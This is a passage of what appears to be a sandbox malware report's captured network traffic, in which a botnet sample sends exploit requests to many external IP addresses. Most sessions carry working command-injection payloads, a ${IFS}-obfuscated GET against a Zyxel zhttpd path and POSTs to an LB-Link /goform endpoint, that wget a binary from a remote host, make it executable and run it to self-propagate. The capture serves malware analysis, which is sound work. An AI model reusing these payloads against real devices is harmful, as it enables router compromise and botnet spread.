                                                        Feb 2, 2024 06:21:25.253751993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8310192.168.2.143953265.215.190.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.253791094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8311192.168.2.14340782.68.255.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.253820896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8312192.168.2.1459822143.63.187.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.253849983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8313192.168.2.1458450114.63.43.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.253910065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8314192.168.2.143812625.64.67.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.257527113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8315192.168.2.1459144116.182.110.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.257565975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8316192.168.2.145532264.40.15.198080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.451288939 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                        Feb 2, 2024 06:21:25.646311045 CET1260INHTTP/1.1 400 Bad Request
                                                        Server: squid/4.10
                                                        Mime-Version: 1.0
                                                        Date: Fri, 02 Feb 2024 05:21:25 GMT
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Length: 3557
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Vary: Accept-Language
                                                        Content-Language: en
                                                        X-Cache: MISS from localhost
                                                        X-Cache-Lookup: NONE from localhost:8080
                                                        Via: 1.1 localhost (squid/4.10)
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 39 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2019 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2020 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8317192.168.2.144683485.156.78.1248080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.557729006 CET225OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                        Feb 2, 2024 06:21:25.784815073 CET32INHTTP/1.1 501 Not Implemented


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8318192.168.2.1433314206.255.120.98080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.696511984 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8319192.168.2.145655238.249.28.1008080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.991312981 CET225OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                        Feb 2, 2024 06:21:27.490534067 CET225OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                        Feb 2, 2024 06:21:29.282459021 CET225OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8320192.168.2.144690832.171.32.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.249634027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8321192.168.2.1443620198.192.244.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.249761105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8322192.168.2.1433096170.6.114.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.249799967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8323192.168.2.145430627.62.134.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.249839067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8324192.168.2.144037498.186.51.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.249856949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8325192.168.2.1440058121.123.222.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.249895096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8326192.168.2.1432888162.198.145.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.249917030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8327192.168.2.1432788182.83.1.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.249969959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8328192.168.2.145402853.251.188.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.250015974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8329192.168.2.1438408112.173.250.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.250070095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8330192.168.2.1439436152.137.182.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.250097036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8331192.168.2.1435746170.102.84.130443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.250138044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8332192.168.2.143984250.25.227.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.250178099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8333192.168.2.1452540191.11.159.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.250206947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8334192.168.2.1459118170.66.243.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.250253916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8335192.168.2.1441400193.17.82.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.250302076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8336192.168.2.143356096.189.39.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.250356913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8337192.168.2.1453300164.232.24.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.250405073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8338192.168.2.1444972185.231.222.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.250432968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8339192.168.2.1434906181.176.71.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.250456095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8340192.168.2.1444086179.2.7.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.250508070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8341192.168.2.144681291.186.174.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.250583887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8342192.168.2.1442994144.145.187.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.250629902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8343192.168.2.144062853.48.178.93443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.250669956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8344192.168.2.1436364139.25.131.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.250721931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8345192.168.2.1446060148.90.167.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.250760078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8346192.168.2.1460890166.0.44.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.250814915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8347192.168.2.145642012.194.72.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.250854969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8348192.168.2.1460636216.190.26.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.250884056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8349192.168.2.1452498156.151.117.13443
                                                        TimestampBytes transferredDirectionData
